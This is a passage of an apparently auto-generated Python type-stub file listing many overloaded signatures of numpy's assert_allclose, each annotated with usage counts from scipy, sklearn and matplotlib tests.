actual: float, desired: numpy.float64, err_msg: Literal["(10.0,) f ['float']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: float, desired: numpy.float64, err_msg: Literal["(1, 1.0) ld ['long']"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0,) d ['double']"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float, float, float],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex, complex, complex],
desired: Tuple[
numpy.complex128, numpy.complex128, numpy.complex128, numpy.complex128
],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-10+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((-1+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((1+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10-10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10-1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10+1j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: complex, desired: numpy.complex128, err_msg: Literal["((10+10j),) D None"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(-10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(-1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(1.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[complex, complex],
desired: Tuple[numpy.complex128, numpy.complex128],
err_msg: Literal["(10.0,) d None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(-1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(1.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0, -1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 1.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float],
desired: Tuple[numpy.float64, numpy.float64],
err_msg: Literal["(10.0, 10.0) dd None"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: numpy.float64, rtol: float, atol: int, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[float, int]], rtol: int, atol: float
):
"""
usage.scipy: 1
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.complex128, desired: numpy.complex128, rtol: float, atol: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.complex128, desired: float, rtol: float, atol: int):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float32, desired: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float128, desired: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[float, float],
rtol: float,
atol: int,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["Y^0_0 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Y^-1_1 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Y^0_1 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal["Y^1_1 incorrect"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64, desired: float, rtol: numpy.float64, atol: int
):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: List[numpy.int64], desired: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[numpy.float64], rtol: float, atol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["binom"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["binom - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.ndarray, rtol: float, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float64, rtol: float, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["boltzmann"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["boltzmann - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["dlaplace"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["dlaplace - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["geom"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["geom - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["nbinom"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["nbinom - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["planck"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["planck - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["poisson"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["poisson - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["randint"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal["randint - kurtosis"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: float,
rtol: float,
atol: float,
err_msg: Literal["sample distribution"],
verbose: bool,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64], desired: numpy.ndarray, rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[float, int]], rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[float]):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[int],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, numpy.float64]],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, int]],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.ndarray, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[Union[float, numpy.float64]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: Tuple[
numpy.ndarray,
numpy.ndarray,
List[Union[numpy.float64, int, float]],
List[Union[float, int]],
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.float64, numpy.float64],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
desired: List[float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.ndarray]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[float]], atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64], desired: List[Union[int, float]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[int], atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[float], rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[Union[int, numpy.float64]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[float, numpy.float64, numpy.float64, numpy.float64],
rtol: float,
atol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, float, numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, float, numpy.float64, numpy.float64],
rtol: float,
atol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[int, numpy.float64, numpy.float64],
desired: Tuple[int, numpy.float64, numpy.float64],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.int64, desired: float, rtol: float):
"""
usage.scipy: 16
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float], desired: List[float], atol: float, err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[float, float], desired: List[Union[float, int]], atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[float, float],
rtol: float,
):
"""
usage.scipy: 6
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64], desired: List[float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.morestats.WilcoxonResult, desired: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: List[float], rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64],
desired: List[float],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.float64], desired: numpy.ndarray, rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: Tuple[float, float], desired: List[float]):
"""
usage.scipy: 4
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.float64], rtol: float):
"""
usage.scipy: 6
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: numpy.ndarray, rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: numpy.ma.core.MaskedArray, rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: List[float], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.NormaltestResult,
desired: scipy.stats.mstats_basic.NormaltestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SkewtestResult,
desired: scipy.stats.mstats_basic.SkewtestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.KurtosistestResult,
desired: scipy.stats.mstats_basic.KurtosistestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.NormaltestResult,
desired: scipy.stats.stats.NormaltestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SkewtestResult,
desired: scipy.stats.stats.SkewtestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.KurtosistestResult,
desired: scipy.stats.stats.KurtosistestResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.Ttest_relResult,
desired: scipy.stats.mstats_basic.Ttest_relResult,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_relResult,
desired: scipy.stats.mstats_basic.Ttest_relResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.Ttest_indResult,
desired: scipy.stats.mstats_basic.Ttest_indResult,
):
"""
usage.scipy: 5
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_indResult,
desired: scipy.stats.mstats_basic.Ttest_indResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.Ttest_1sampResult,
desired: scipy.stats.mstats_basic.Ttest_1sampResult,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_1sampResult,
desired: scipy.stats.mstats_basic.Ttest_1sampResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ma.core.MaskedArray, rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: float, atol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: numpy.ma.core.MaskedArray, atol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: int, rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: List[int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[int, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.ndarray):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[Union[float, int]]], rtol: float
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[List[Union[int, float]]]], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[List[List[List[Union[float, int]]]]],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[List[float]], rtol: float):
"""
usage.scipy: 2
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[List[float]]], rtol: float
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[numpy.ndarray], rtol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray, desired: List[List[numpy.ndarray]], rtol: float
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64],
desired: List[Union[numpy.int64, numpy.float64]],
rtol: float,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, atol: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: List[numpy.float64], desired: List[float], rtol: float, atol: int
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.stats.SpearmanrResult,
desired: scipy.stats.stats.SpearmanrResult,
):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SpearmanrResult,
desired: scipy.stats.mstats_basic.SpearmanrResult,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[float, float, float],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.SpearmanrResult, desired: Tuple[float, int]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.KendalltauResult,
desired: Tuple[float, float],
rtol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: list):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_relResult,
desired: scipy.stats.stats.Ttest_relResult,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_relResult,
desired: Tuple[int, float],
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_indResult,
desired: scipy.stats.stats.Ttest_indResult,
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: scipy.stats.mstats_basic.Ttest_indResult,
desired: Tuple[float, float],
atol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[List[float], List[float]],
rtol: float,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.matrix, desired: numpy.matrix, rtol: float):
"""
usage.scipy: 3
"""
...
@overload
def assert_allclose(actual: numpy.float32, desired: numpy.float64, rtol: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ma.core.MaskedArray, desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: float, rtol: float, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: float, rtol: int, atol: float):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: Tuple[
float, float, float, float, float, float, float, float, float, float
],
rtol: int,
atol: float,
):
"""
usage.scipy: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64], desired: Tuple[float, float]
):
"""
usage.matplotlib: 9
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.matplotlib: 4
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
atol: float,
):
"""
usage.matplotlib: 8
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: range):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(actual: Tuple[numpy.float64, numpy.float64], desired: List[float]):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_allclose(actual: Tuple[int, int], desired: Tuple[int, int], rtol: float):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ma.core.MaskedArray, desired: numpy.ma.core.MaskedArray
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.uint8, numpy.uint8, numpy.uint8, numpy.uint8, numpy.uint8],
desired: List[numpy.uint8],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: List[Tuple[int, int]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[Tuple[Union[int, numpy.float64], Union[int, numpy.float64]]],
atol: float,
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: List[List[Union[float, int]]],
err_msg: numpy.ndarray,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: List[Union[int, float]],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(
actual: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
desired: List[Union[float, int]],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_allclose(actual: float, desired: numpy.float32, rtol: float):
"""
usage.sklearn: 7
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 7
"""
...
@overload
def assert_allclose(actual: numpy.ndarray, desired: pandas.core.frame.DataFrame):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float64,
desired: numpy.float64,
rtol: float,
atol: float,
err_msg: Literal[""],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["StackingClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["StackingRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["VotingRegressor"],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_allclose(
actual: numpy.ndarray,
desired: numpy.ndarray,
atol: float,
err_msg: Literal["VotingClassifier"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: List[numpy.int64], desired: List[numpy.int64]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(
actual: numpy.float32, desired: numpy.float64, rtol: float, atol: float
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_allclose(actual: numpy.float64, desired: numpy.float64, err_msg: str):
"""
usage.sklearn: 24
"""
